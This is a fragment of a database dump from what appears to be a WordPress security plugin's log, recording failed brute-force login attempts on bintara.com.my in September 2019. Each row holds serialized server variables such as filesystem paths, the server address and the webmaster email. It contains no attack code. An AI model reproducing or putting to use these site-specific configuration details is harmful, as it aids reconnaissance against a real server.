Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"46324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFaIY75s89pqgR69SLdCwAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568758305.3825\";s:12:\"REQUEST_TIME\";s:10:\"1568758305\";}}','notice','2019-09-17 22:11:47','2019-09-17 22:11:45',18255600,19555256,'https://bintara.com.my/xmlrpc.php',1,0,'5.196.12.2'),(24768,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"45826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFclEQGijxhVPhG1M0APQAAAAA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568758932.969\";s:12:\"REQUEST_TIME\";s:10:\"1568758932\";}}','notice','2019-09-17 22:22:14','2019-09-17 22:22:13',17739608,19230336,'https://bintara.com.my/wp-login.php',1,0,'104.238.125.133'),(24769,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"104.238.125.133\";s:11:\"REMOTE_PORT\";s:5:\"46236\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFcl24SfF9g@8lNlxwi0gAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568758935.7694\";s:12:\"REQUEST_TIME\";s:10:\"1568758935\";}}','notice','2019-09-17 22:22:17','2019-09-17 22:22:16',18257064,19555928,'https://bintara.com.my/xmlrpc.php',1,0,'104.238.125.133'),(24770,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.224.174\";s:11:\"REMOTE_PORT\";s:5:\"54288\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFd-CqbKGlf1IVly7N8VAAAAUg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759292.1989\";s:12:\"REQUEST_TIME\";s:10:\"1568759292\";}}','notice','2019-09-17 22:28:13','2019-09-17 22:28:12',17739384,19230112,'https://bintara.com.my/wp-login.php',1,0,'68.183.224.174'),(24771,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.224.174\";s:11:\"REMOTE_PORT\";s:5:\"55232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFeAG4SfF9g@8lNlxwi@AAAAEo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759296.8024\";s:12:\"REQUEST_TIME\";s:10:\"1568759296\";}}','notice','2019-09-17 22:28:18','2019-09-17 22:28:17',18255584,19554272,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.224.174'),(24772,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"32980\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFff0QGijxhVPhG1M0AlQAAABc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759679.0848\";s:12:\"REQUEST_TIME\";s:10:\"1568759679\";}}','notice','2019-09-17 22:34:40','2019-09-17 22:34:39',17739456,19229800,'https://bintara.com.my/wp-login.php',1,0,'50.31.26.18'),(24773,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"50.31.26.18\";s:11:\"REMOTE_PORT\";s:5:\"33235\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFfgY75s89pqgR69SLfygAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568759681.8379\";s:12:\"REQUEST_TIME\";s:10:\"1568759681\";}}','notice','2019-09-17 22:34:43','2019-09-17 22:34:42',18255144,19554384,'https://bintara.com.my/xmlrpc.php',1,0,'50.31.26.18'),(23687,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"66.85.47.62\";s:11:\"REMOTE_PORT\";s:5:\"43462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXOynKVIMuzgc1YVEzhJzAAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567863452.8069\";s:12:\"REQUEST_TIME\";s:10:\"1567863452\";}}','notice','2019-09-07 13:37:34','2019-09-07 13:37:33',17741760,19232672,'https://bintara.com.my/wp-login.php',1,0,'66.85.47.62'),(23694,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-07 20:24:47','2019-09-07 20:24:44',17755224,18217216,'http://bintara.com.my/microsoft/',1,0,'157.55.39.88'),(23695,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"136.144.210.48\";s:11:\"REMOTE_PORT\";s:5:\"59538\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXQf@IjnkVx6k5bJrKjBLgAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567891448.6437\";s:12:\"REQUEST_TIME\";s:10:\"1567891448\";}}','notice','2019-09-07 21:24:09','2019-09-07 21:24:09',17699080,19189816,'https://bintara.com.my/wp-login.php',1,0,'136.144.210.48'),(23688,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 